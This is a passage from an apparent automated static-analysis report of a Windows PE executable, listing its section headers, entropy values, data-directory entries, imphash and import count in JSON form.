  4991. "characteristics_raw": "0xc0000000"
  4992. },
  4993. {
  4994. "name": ".idata",
  4995. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  4996. "virtual_address": "0x00076000",
  4997. "size_of_data": "0x00002600",
  4998. "entropy": "4.83",
  4999. "raw_address": "0x00073a00",
  5000. "virtual_size": "0x000024c6",
  5001. "characteristics_raw": "0xc0000040"
  5002. },
  5003. {
  5004. "name": ".tls",
  5005. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  5006. "virtual_address": "0x00079000",
  5007. "size_of_data": "0x00000000",
  5008. "entropy": "0.00",
  5009. "raw_address": "0x00076000",
  5010. "virtual_size": "0x00000010",
  5011. "characteristics_raw": "0xc0000000"
  5012. },
  5013. {
  5014. "name": ".rdata",
  5015. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  5016. "virtual_address": "0x0007a000",
  5017. "size_of_data": "0x00000200",
  5018. "entropy": "0.21",
  5019. "raw_address": "0x00076000",
  5020. "virtual_size": "0x00000018",
  5021. "characteristics_raw": "0x50000040"
  5022. },
  5023. {
  5024. "name": ".reloc",
  5025. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  5026. "virtual_address": "0x0007b000",
  5027. "size_of_data": "0x00008400",
  5028. "entropy": "6.65",
  5029. "raw_address": "0x00076200",
  5030. "virtual_size": "0x000083a4",
  5031. "characteristics_raw": "0x50000040"
  5032. },
  5033. {
  5034. "name": ".rsrc",
  5035. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  5036. "virtual_address": "0x00084000",
  5037. "size_of_data": "0x00042200",
  5038. "entropy": "7.38",
  5039. "raw_address": "0x0007e600",
  5040. "virtual_size": "0x00042144",
  5041. "characteristics_raw": "0x50000040"
  5042. }
  5043. ],
  5044. "resources": [],
  5045. "dirents": [
  5046. {
  5047. "virtual_address": "0x00000000",
  5048. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  5049. "size": "0x00000000"
  5050. },
  5051. {
  5052. "virtual_address": "0x00076000",
  5053. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  5054. "size": "0x000024c6"
  5055. },
  5056. {
  5057. "virtual_address": "0x00084000",
  5058. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  5059. "size": "0x00042144"
  5060. },
  5061. {
  5062. "virtual_address": "0x00000000",
  5063. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  5064. "size": "0x00000000"
  5065. },
  5066. {
  5067. "virtual_address": "0x00000000",
  5068. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  5069. "size": "0x00000000"
  5070. },
  5071. {
  5072. "virtual_address": "0x0007b000",
  5073. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  5074. "size": "0x000083a4"
  5075. },
  5076. {
  5077. "virtual_address": "0x00000000",
  5078. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  5079. "size": "0x00000000"
  5080. },
  5081. {
  5082. "virtual_address": "0x00000000",
  5083. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  5084. "size": "0x00000000"
  5085. },
  5086. {
  5087. "virtual_address": "0x00000000",
  5088. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  5089. "size": "0x00000000"
  5090. },
  5091. {
  5092. "virtual_address": "0x0007a000",
  5093. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  5094. "size": "0x00000018"
  5095. },
  5096. {
  5097. "virtual_address": "0x00000000",
  5098. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  5099. "size": "0x00000000"
  5100. },
  5101. {
  5102. "virtual_address": "0x00000000",
  5103. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  5104. "size": "0x00000000"
  5105. },
  5106. {
  5107. "virtual_address": "0x00000000",
  5108. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  5109. "size": "0x00000000"
  5110. },
  5111. {
  5112. "virtual_address": "0x00000000",
  5113. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  5114. "size": "0x00000000"
  5115. },
  5116. {
  5117. "virtual_address": "0x00000000",
  5118. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  5119. "size": "0x00000000"
  5120. },
  5121. {
  5122. "virtual_address": "0x00000000",
  5123. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  5124. "size": "0x00000000"
  5125. }
  5126. ],
  5127. "exports": [],
  5128. "guest_signers": {},
  5129. "imphash": "d553c8d26e9a2369ccc8481987fa6051",
  5130. "icon_fuzzy": null,
  5131. "icon": null,
  5132. "pdbpath": null,
  5133. "imported_dll_count": 17,
  5134. "versioninfo": []
  5135. }
  5136. }
Add Comment
Please, Sign In to add comment